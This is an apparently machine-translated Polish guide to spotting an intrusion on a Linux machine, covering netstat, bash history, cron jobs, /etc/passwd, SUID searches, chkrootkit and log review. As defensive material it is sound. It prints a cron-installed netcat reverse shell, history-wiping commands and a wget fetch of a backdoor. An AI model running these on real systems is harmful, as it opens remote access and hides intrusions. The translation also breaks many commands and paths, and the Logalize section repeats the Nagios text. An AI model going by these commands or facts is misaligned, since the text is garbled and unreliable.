Netstat
NetStat jest ważnym narzędziem sieci TCP/IP, które zapewnia informacje i statystyki dotyczące protokołów w użyciu i aktywnych połączeniach sieciowych.
Użyjemy Netstat Na przykładowym komputerze ofiary, aby sprawdzić coś podejrzanego w aktywnych połączeniach sieciowych za pośrednictwem następującego polecenia:
Ubuntu@ubuntu: ~ $ netstat -antp
Tutaj zobaczymy wszystkie aktualnie aktywne połączenia. Teraz będziemy szukać połączenie, które nie powinno tam być.
Oto aktywne połączenie w porcie 44999 (port, który nie powinien być otwarty).Widzimy inne szczegóły dotyczące połączenia, takie jak Pid, i nazwa programu, którą działa w ostatniej kolumnie. W tym przypadku Pid Jest 1555 a złośliwy ładunek, którym działa ./powłoka.elf plik.
Kolejne polecenie do sprawdzania portów obecnie słuchających i aktywnych w systemie jest następujące:
Ubuntu@ubuntu: ~ $ netstat -la
To dość niechlujne wyjście. Aby odfiltrować połączenia słuchowe i ustalone, użyjemy następującego polecenia:
Ubuntu@ubuntu: ~ $ netstat -la | Grep „Słuchaj” „Ustanowiony”
To da ci tylko wyniki, które mają znaczenie, abyś mógł łatwiej sortować te wyniki. Możemy zobaczyć aktywne połączenie Port 44999 W powyższych wynikach.
Po rozpoznaniu złośliwego procesu możesz zabić proces za pomocą następujących poleceń. Zwrócimy uwagę Pid procesu za pomocą polecenia NetStat i zabij proces za pomocą następującego polecenia:
Ubuntu@ubuntu: ~ $ Kill 1555
~.Historia bash
Linux prowadzi rekord, w którym użytkownicy zalogowali się do systemu, od tego, co IP, kiedy i na jak długo.
Możesz uzyskać dostęp do tych informacji za pomocą ostatni Komenda. Wyjście tego polecenia wyglądałoby w następujący sposób:
Ubuntu@ubuntu: ~ $ last
Dane wyjściowe pokazuje nazwę użytkownika w pierwszej kolumnie, terminal w drugim, adres źródłowy w trzecim czasie, czas logowania w czwartej kolumnie i całkowity czas sesji zarejestrowany w ostatniej kolumnie. W takim przypadku użytkownicy Usman I Ubuntu są nadal zalogowane. Jeśli zobaczysz jakąkolwiek sesję, która nie jest autoryzowana lub wygląda złośliwie, zapoznaj się z ostatnią sekcją tego artykułu.
Historia rejestrowania jest przechowywana ~.Historia bash plik. Więc historię można łatwo usunąć, usuwając .Historia bash plik. Ta akcja jest często wykonywana przez atakujących w celu pokrycia ich utworów.
Ubuntu@ubuntu: ~ $ cat .bash_history
To polecenie wyświetli polecenia uruchomione w twoim systemie, a najnowsze polecenie wykonane na dole listy.
Historię można usunąć za pomocą następującego polecenia:
Ubuntu@ubuntu: ~ $ historia -c
To polecenie tylko usunie historię z terminalu, którego obecnie używasz. Istnieje więc bardziej poprawny sposób:
Ubuntu@ubuntu: ~ $ cat/dev/null> ~/.bash_history
To wyjaśni zawartość historii, ale utrzymuje plik na miejscu. Tak więc, jeśli widzisz tylko swój obecny login po uruchomieniu ostatni polecenie, to wcale nie jest dobry znak. Wskazuje to, że twój system mógł zostać zagrożony i że atakujący prawdopodobnie usunęł historię.
Jeśli podejrzewasz złośliwego użytkownika lub IP, zaloguj się jako ten użytkownik i uruchom polecenie historia, następująco:
Ubuntu@ubuntu: ~ $ su
Ubuntu@ubuntu: ~ $ historia
To polecenie wyświetli historię poleceń, czytając plik .Historia bash w /dom folder tego użytkownika. Ostrożnie szukaj wget, kędzior, Lub Netcat Polecenia, na wypadek, gdyby atakujący używał tych poleceń do przesyłania plików lub instalacji z narzędzi repo, takich jak kryptowaluty lub boty spamowe.
Spójrz na poniższy przykład:
Powyżej możesz zobaczyć polecenie "wget https: // github.com/sajith/mod-rootme." W tym poleceniu haker próbował uzyskać dostęp do pliku poza repozytorium za pomocą wget Aby pobrać backdoor o nazwie „Mod-Root Me” i zainstaluj go w swoim systemie. To polecenie w historii oznacza, że system jest zagrożony i został wyrzucony przez atakującego.
Pamiętaj, że ten plik może być ręcznie wydalony lub wytworzyć jego substancję. Dane podane przez to polecenie nie mogą być traktowane jako określona rzeczywistość. Jednak w przypadku, gdy atakujący przeprowadził „złe” polecenie i zaniedbał ewakuację historii, będzie tam.
Jobs Cron
Cron Jobs może służyć jako istotne narzędzie po skonfigurowaniu do konfigurowania odwrotnej powłoki na maszynie atakującego. Edycja Jobs Cron jest ważną umiejętnością, podobnie jak wiedza o ich obejrzeniu.
Aby wyświetlić zadania CRON działające dla bieżącego użytkownika, użyjemy następującego polecenia:
Ubuntu@ubuntu: ~ $ crontab -l
Aby wyświetlić zadania CRON działające dla innego użytkownika (w tym przypadku Ubuntu), użyjemy następującego polecenia:
Ubuntu@ubuntu: ~ $ crontab -u ubuntu -l
Aby wyświetlić codzienne, godzinowe, tygodniowe i miesięczne prace CRON, będziemy używać następujących poleceń:
Daily Cron Jobs:
Ubuntu@ubuntu: ~ $ ls -la /etc /cron.codziennie
Godzinowe prace Cron:
Ubuntu@ubuntu: ~ $ ls -la /etc /cron.cogodzinny
Cotygodniowe prace Cron:
Ubuntu@ubuntu: ~ $ ls -la /etc /cron.co tydzień
Brać przykład:
Atakujący może włożyć pracę Cron /etc/crontab To prowadzi złośliwe polecenie 10 minut po minucie. Atakujący może również prowadzić złośliwą usługę lub odwrotną skorupę za pośrednictwem Netcat lub inne narzędzie. Kiedy wykonujesz polecenie $ ~ crontab -l, Zobaczysz pracę CRON, która działa:
Ubuntu@ubuntu: ~ $ crontab -l
Ct = $ (crontab -l)
Ct = $ ct $ '\ n10 * * * * nc -e /bin /bash 192.168.8.131 44999 '
printf „$ ct” | crontab -
PS Aux
Aby właściwie sprawdzić, czy system został zagrożony, ważne jest również, aby przeglądać uruchomione procesy. Są przypadki, w których niektóre nieautoryzowane procesy nie zużywają wystarczającego użytkowania procesora, aby uzyskać na liście szczyt Komenda. Tam będziemy używać Ps polecenie wyświetlania wszystkich obecnie działających procesów.
Ubuntu@ubuntu: ~ $ ps auxf
Pierwsza kolumna pokazuje użytkownika, druga kolumna pokazuje unikalny identyfikator procesu, a użycie procesora i pamięci są pokazane w następnych kolumnach.
Ta tabela dostarczy Ci najwięcej informacji. Powinieneś sprawdzić każdy uruchomiony proces, aby poszukać czegoś osobliwego, aby wiedzieć, czy system jest naruszony, czy nie. W przypadku, gdy znajdziesz coś podejrzanego, Google lub uruchom z lsof polecenie, jak pokazano powyżej. To dobry nawyk do biegania Ps Polecenia na twoim serwerze i zwiększy twoje szanse na znalezienie czegoś podejrzanego lub z codziennej rutyny.
/etc/passwd
/etc/passwd Plik śledzi każdego użytkownika w systemie. Jest to plik oddzielony do okrężnicy zawierający informacje, takie jak nazwa użytkownika, userID, szyfrowane hasło, GroupID (GID), pełna nazwa użytkownika, katalog domowy użytkownika i powłoka logowania.
Jeśli atakujący wbija się do twojego systemu, istnieje możliwość, że stworzy więcej użytkowników, aby utrzymać rzeczy do oddzielania lub stworzyć tylną część w systemie, aby wrócić za pomocą tego tylnego. Podczas sprawdzania, czy system został zagrożony, powinieneś również zweryfikować każdego użytkownika w pliku /etc /passwd. Wpisz następujące polecenie, aby to zrobić:
Ubuntu@ubuntu: ~ $ cat itp./Passwd
To polecenie da ci wyjście podobne do tego poniżej:
Gnome-initial-settup: x: 120: 65534 ::/run/gnome-initial-settup/:/bin/false
GDM: x: 121: 125: GNOME Display Manager:/var/lib/gdm3:/bin/false
Usman: X: 1000: 1000: Usman:/Home/Usman:/Bin/Bash
Postgres: x: 122: 128: Administrator PostgreSQL ,,,:/var/lib/postgresql:/bin/bash
Debian-Tor: x: 123: 129 ::/var/lib/tor:/bin/false
Ubuntu: x: 1001: 1001: Ubuntu ,,,:/home/ubuntu:/bin/bash
Lightdm: x: 125: 132: Light Display Manager:/var/lib/lightdm:/bin/false
Debian-GDM: x: 124: 131: Gnome Display Manager:/var/lib/gdm3:/bin/false
Anonimowy: x: 1002: 1002: ,,,:/home/anonimowy:/bin/bash
Teraz będziesz chciał szukać każdego użytkownika, którego nie jesteś świadomy. W tym przykładzie możesz zobaczyć użytkownika w pliku o nazwie „Anonimowy.„Kolejną ważną rzeczą, na którą należy zwrócić uwagę, jest to, że jeśli atakujący utworzył użytkownika, aby z powrotem zalogować się, użytkownik będzie miał również przypisaną powłokę„/bin/bash ”. Możesz więc zawęzić swoje wyszukiwanie, GREPPING następujące dane wyjściowe:
Ubuntu@ubuntu: ~ $ cat /etc /passwd | grep -i "/bin/bash"
Usman: X: 1000: 1000: Usman:/Home/Usman:/Bin/Bash
Postgres: x: 122: 128: Administrator PostgreSQL ,,,:/var/lib/postgresql:/bin/bash
Ubuntu: x: 1001: 1001: Ubuntu ,,,:/home/ubuntu:/bin/bash
Anonimowy: x: 1002: 1002: ,,,:/home/anonimowy:/bin/bash
Możesz wykonać dalsze „bash magia”, aby udoskonalić swoje wyjście.
Ubuntu@ubuntu: ~ $ cat /etc /passwd | grep -i "/bin/bash" | CUT -d ":" -f 1
Usman
Postgres
Ubuntu
anonimowy
Znajdować
Wyszukiwania oparte na czasie są przydatne do szybkiego segregacji. Użytkownik może również modyfikować znaczniki czasu zmieniające plik. Aby poprawić niezawodność, uwzględnij CTime w kryteriach, ponieważ jest o wiele trudniej manipulować, ponieważ wymaga modyfikacji niektórych plików poziomowych.
Możesz użyć następującego polecenia, aby znaleźć pliki utworzone i zmodyfikowane w ciągu ostatnich 5 dni:
Ubuntu@ubuntu: ~ $ Find / -mtime -o -ctime -5
Aby znaleźć wszystkie pliki SUID należące do root i sprawdzić, czy na listach znajdują się jakieś nieoczekiwane wpisy, użyjemy następującego polecenia:
Ubuntu@ubuntu: ~ $ Find / -perm -4000 -User root -type f
Aby znaleźć wszystkie pliki SGID (Ustaw identyfikator użytkownika) należące do root i sprawdź, czy na listach znajdują się jakieś nieoczekiwane wpisy, użyjemy następującego polecenia:
Ubuntu@ubuntu: ~ $ Find / -perm -6000 -Type f
Chkrootkit
Rootkits to jedna z najgorszych rzeczy, które mogą się zdarzyć w systemie i są jednym z najniebezpieczniejszych ataków, bardziej niebezpiecznych niż złośliwe oprogramowanie i wirusy, zarówno pod względem uszkodzeń systemu, jak i trudności w ich znalezieniu i wykryciu.
Są one zaprojektowane w taki sposób, że pozostają ukryte i robią złośliwe rzeczy, takie jak kradzież kart kredytowych i informacji o bankowości internetowej. Rootkits Daj cyberprzestępcom możliwość kontrolowania systemu komputerowego. Rootkits pomagają również atakującemu w monitorowaniu klawiszy na klawiszy i wyłączeniu oprogramowania antywirusowego, co ułatwia kradzież prywatnych informacji.
Tego rodzaju złośliwe oprogramowanie mogą pozostać w twoim systemie przez długi czas bez zauważenia użytkownika, i mogą spowodować poważne uszkodzenia. Kiedyś Rootkit jest wykrywany, nie ma innego sposobu, jak tylko ponowić ponowne zainstalowanie całego systemu. Czasami te ataki mogą nawet powodować awarię sprzętu.
Na szczęście istnieją kilka narzędzi, które mogą pomóc w wykryciu Rootkits W systemach Linux, takich jak Lynis, Clam AV lub LMD (wykrywanie złośliwego oprogramowania Linux). Możesz sprawdzić swój system pod kątem znanego Rootkits Korzystanie z poniższych poleceń.
Najpierw zainstaluj Chkrootkit Za pośrednictwem następującego polecenia:
Ubuntu@ubuntu: ~ $ sudo apt instal instaluj chkrootkit
To zainstaluje Chkrootkit narzędzie. Możesz użyć tego narzędzia do sprawdzenia rootkits za pomocą następującego polecenia:
Ubuntu@ubuntu: ~ $ sudo chkrootkit
Pakiet Chkrootkit składa się ze skryptu Shell, który sprawdza systemy systemowe pod kątem modyfikacji rootkit, a także kilku programów, które sprawdzają różne problemy bezpieczeństwa. W powyższej sprawie pakiet sprawdzony pod kątem znaku rootkit w systemie i nie znalazł żadnego. Cóż, to dobry znak!
Dzienniki Linux
Dzienniki Linux dają harmonogram zdarzeń w ramach roboczych i aplikacji Linux i są ważnym instrumentem dochodzeniowym, gdy doświadczasz problemów. Główne zadanie, które administrator musi wykonać, gdy dowiaduje się, że system jest zagrożony.
W przypadku problemów z zastosowaniem w strefie roboczej rekordy dziennika są utrzymywane w kontakcie z różnymi obszarami. Na przykład Chrome komponuje raporty o awarie '~/.Raporty Chrome/Crash '), W przypadku gdy aplikacja obszarze roboczego komponuje dzienniki zależne od inżyniera i pokazuje, czy aplikacja uwzględnia niestandardowe układu dziennika. Zapisy są w/var/log informator. Istnieją dzienniki Linux dla wszystkiego: Framework, porcja, szefowie pakietów, formularze rozruchowe, Xorg, Apache i MySQL. W tym artykule motyw jawnie koncentruje się na dziennikach Linux Framework.
Możesz zmienić się na ten katalog, wykorzystując zamówienie na dyski kompaktowe. Powinieneś mieć uprawnienia do wyświetlania lub zmiany plików dziennika.
Ubuntu@ubuntu: ~ $ cd /var /log
Instrukcje wyświetlania dzienników Linux
Użyj następujących poleceń, aby zobaczyć niezbędne dokumenty LOG.
Dzienniki Linux można zobaczyć za pomocą polecenia CD /var /log, W tym momencie komponując zamówienie, aby zobaczyć, jak logi zostały odłożone w tym katalogu. Jednym z najważniejszych dzienników jest Syslog, który rejestruje wiele ważnych dzienników.
Ubuntu@ubuntu: cat syslog
Aby zdezynfekować wyjście, użyjemy „mniej" Komenda.
Ubuntu@Ubuntu: Cat Syslog | mniej
Wpisz polecenie var/log/syslog zobaczyć sporo rzeczy pod plik syslog. Skoncentrowanie się na konkretnym problemie zajmie trochę czasu, ponieważ ten rekord zwykle będzie długi. Naciśnij Shift+G, aby przewijać w dół w wyniku rekordu, co oznacza „koniec."
Możesz również zobaczyć dzienniki za pomocą DMESG, który drukuje obsługę pierścienia części. Ta funkcja drukuje wszystko i wysyła Cię w miarę możliwości. Od tego momentu możesz skorzystać z zamówienia Dmesg | mniej patrzeć przez wydajność. W przypadku, gdy musisz zobaczyć dzienniki dla danego użytkownika, musisz uruchomić następujące polecenie:
DMESG - obiekt = użytkownik
Podsumowując, możesz użyć zamówienia ogona, aby zobaczyć dokumenty LOG. Jest to niewielkie, ale przydatne narzędzie, którego można użyć, ponieważ służy do pokazania ostatniej części dzienników, w której najprawdopodobniej wystąpił problem. Możesz także określić liczbę ostatnich bajtów lub linii, które można wyświetlić w poleceniu ogona. W tym celu skorzystaj z polecenia ogon/var/log/syslog. Istnieje wiele sposobów spojrzenia na dzienniki.
Dla określonej liczby wierszy (model rozważa ostatnie 5 wierszy), wprowadź następujące polecenie:
Ubuntu@ubuntu: ~ $ tail -f -n 5/var/log/syslog
To wydrukuje najnowsze 5 wierszy. Kiedy nadejdzie kolejna linia, poprzednia zostanie ewakuowana. Aby uciec od zamówienia ogona, naciśnij Ctrl+x.
Ważne dzienniki Linuksa
Główne cztery dzienniki Linux obejmują:
Ubuntu@Ubuntu: Cat Syslog | mniej
Ubuntu@Ubuntu: Cat Auth.Log | mniej
Ubuntu@ubuntu: cat boot.Log | mniej
Ubuntu@Ubuntu: Cat Maillog | mniej
Ubuntu@Ubuntu: Cat Kern | mniej
Ubuntu@Ubuntu: Cat Dmesg | mniej
Ubuntu@Ubuntu: Cat Faillog | mniej
Ubuntu@Ubuntu: Cat Cron | mniej
Ubuntu@ubuntu: cat yum.Log | mniej
Ubuntu@Ubuntu: Cat httpd | mniej
Ubuntu@ubuntu: cat mysqld.Log | mniej
Narzędzia do przeglądania dzienników Linux
Obecnie dostępnych jest wiele urządzeń do śledzenia dzienników typu open source, dzięki czemu wybieranie odpowiednich zasobów dzienników akcji. Bezpłatne i open source Checkery mogą działać na dowolnym systemie, aby wykonać zadanie. Oto pięć najlepszych, jakie korzystałem w przeszłości, w żadnej konkretnej kolejności.
Graylog
Rozpoczęty w Niemczech w 2011 roku, Graylog jest obecnie oferowany jako urządzenie open source lub porozumienie biznesowe. Graylog ma być sprowadzonym, log-log-tabelg, który odbiera strumienie informacji z różnych serwerów lub punktów końcowych i pozwala szybko przeglądać lub rozbić te dane.
Graylog zgromadził pozytywną rozgłos wśród głowic szkieletowych w wyniku swojej prostoty i wszechstronności. Większość przedsięwzięć internetowych zaczyna się niewiele, ale może się rozwijać wykładniczo. Graylog może regulować stosy nad systemem serwerów zaplecza i codziennie obsługiwać kilka terabajtów informacji o dzienniku.
Przewodniczący IT zobaczą front interfejsu GrayLog jako prosty w użyciu i energiczny w swojej przydatności. GrayLog działa na ideę pulpitów nawigacyjnych, który pozwala użytkownikom wybrać rodzaj pomiarów lub źródeł informacji, które znajdują ważne i szybko obserwują pochyłości po pewnym czasie.
Kiedy nastąpi odcinek bezpieczeństwa lub wykonania, przewodniczący muszą mieć możliwość śledzenia manifestacji do kierowcy podstawowego, jak można się spodziewać. Funkcja wyszukiwania Grayloga sprawia, że to zadanie jest proste. To narzędzie działało w adaptacji do awarii wewnętrznej, która może uruchomić wielokrotne przedsięwzięcia, abyś mógł razem rozbić kilka potencjalnych zagrożeń.
Nagios
Rozpoczęty przez jednego dewelopera w 1999 r. Obecna interpretacja Nagios można zaimplementować na serwerach z dowolnym systemem operacyjnym (Linux, Windows itp.).
Podstawowym elementem Nagios jest serwer dziennika, który usprawnia asortyment informacyjny i udostępnia dane stopniowo dla dyrektorów Framework. Silnik serwera dziennika Nagios złapie informacje stopniowo i przekazuje je przełomowym instrumentem wyszukiwania. Włączenie do innego punktu końcowego lub aplikacji jest prostą gratyfikacją dla tego nieodłącznego kreatora układu.
Nagios jest często wykorzystywany w stowarzyszeniach, które muszą sprawdzić bezpieczeństwo swoich dzielnic i mogą przeglądać zakres okazji związanych z systemem, aby pomóc w robotyce przenoszenia przestrzeni. Nagios można zaprogramować do wykonywania określonych zadań, gdy spełniony jest określony warunek, co pozwala użytkownikom wykrywać problemy nawet przed uwzględnieniem potrzeb człowieka.
Jako główny aspekt oceny systemu, Nagios będzie kierować informacje logarytmiczne zależne od obszaru geograficznego, w którym się uruchamia. Kompletne pulpity nawigacyjne z mapowaniem innowacji można wdrożyć, aby zobaczyć transmisję ruchu internetowego.
Logalize
Logalize produkuje narzędzia open source dla dyrektorów framework lub administrantów i specjalistów ds. Bezpieczeństwa, aby pomóc im w nadzorowaniu dzienników serwerów i pozwalają im skupić się na przekształceniu dzienników w cenne informacje. Podstawowym elementem tego narzędzia jest to, że jest on dostępny jako bezpłatne pobieranie do użytku domowego lub biznesowego.
Podstawowym elementem Nagios jest serwer dziennika, który usprawnia asortyment informacyjny i udostępnia dane stopniowo dla dyrektorów Framework. Silnik serwera dziennika Nagios złapie informacje stopniowo i przekazuje je przełomowym instrumentem wyszukiwania. Włączenie do innego punktu końcowego lub aplikacji jest prostą gratyfikacją dla tego nieodłącznego kreatora układu.
Nagios jest często wykorzystywany w stowarzyszeniach, które muszą sprawdzić bezpieczeństwo swoich dzielnic i mogą przeglądać zakres okazji związanych z systemem, aby pomóc w robotyce przenoszenia przestrzeni. Nagios można zaprogramować do wykonywania określonych zadań, gdy spełniony jest określony warunek, co pozwala użytkownikom wykrywać problemy nawet przed uwzględnieniem potrzeb człowieka.
Jako główny aspekt oceny systemu, Nagios będzie kierować informacje logarytmiczne zależne od obszaru geograficznego, w którym się uruchamia. Kompletne pulpity nawigacyjne z mapowaniem innowacji można wdrożyć, aby zobaczyć transmisję ruchu internetowego.
Co powinieneś zrobić, jeśli zostałeś naruszony?
Najważniejsze jest nie panika, szczególnie jeśli osoba nieautoryzowana jest teraz podpisana. Powinieneś mieć opcję odzyskania kontroli nad maszyną, zanim druga osoba wie, że o nich wiesz. W przypadku, gdy wiedzą, że jesteś świadomy ich obecności, atakujący może trzymać cię z dala od serwera i zacząć niszczyć system. Jeśli nie jesteś taki techniczny, wszystko, co musisz zrobić, to natychmiast wyłączyć cały serwer. Możesz zamknąć serwer za pomocą następujących poleceń:
Ubuntu@ubuntu: ~ $ shutdown -h teraz
Lub
Ubuntu@ubuntu: ~ $ Systemctl Poweroff
Innym sposobem na to jest logowanie się do panelu sterowania dostawcy hostingu i wyłączenie go stamtąd. Po wyłączeniu serwera możesz pracować nad potrzebnymi zasadami zapory i skonsultować się z każdym, aby uzyskać pomoc w swoim czasie.
Jeśli czujesz się bardziej pewny siebie, a twój dostawca hostingowy ma upręczną zaporę ogniową, a następnie tworzyć i umożliwić dwie reguły:
Aby sprawdzić aktywne sesje SSH, użyj następującego polecenia:
Ubuntu@ubuntu: ~ $ ss | Grep Ssh
Użyj następującego polecenia, aby zabić ich sesję SSH:
Ubuntu@ubuntu: ~ $ zabój
To zabije ich sesję SSH i zapewni dostęp do serwera. W przypadku, gdy nie masz dostępu do zapory upstream, będziesz musiał utworzyć i włączyć reguły zapory na samym serwerze. Następnie, kiedy ustawione są reguły zapory, zabij nieautoryzowaną sesję SSH użytkownika za pomocą polecenia „Kill”.
Ostatnia technika, jeśli jest dostępna, zaloguj się na serwer za pomocą połączenia poza pasmem, taką jak konsola szeregowa. Zatrzymaj wszystkie sieci za pośrednictwem następującego polecenia:
Ubuntu@ubuntu: ~ $ Systemctl Stop Network.praca
To w pełni zatrzyma dowolny system do ciebie, więc byłbyś teraz w stanie włączyć sterowanie zaporą w swoim czasie.
Po odzyskaniu kontroli nad serwerem nie ufaj mu łatwo. Nie próbuj naprawić i ponownie ich używać. To, co jest zepsute. Nigdy nie wiedziałbyś, co może zrobić atakujący, więc nigdy nie powinieneś być pewien, że serwer jest bezpieczny. Tak więc ponowna instalacja powinna być twoim ostatnim krokiem.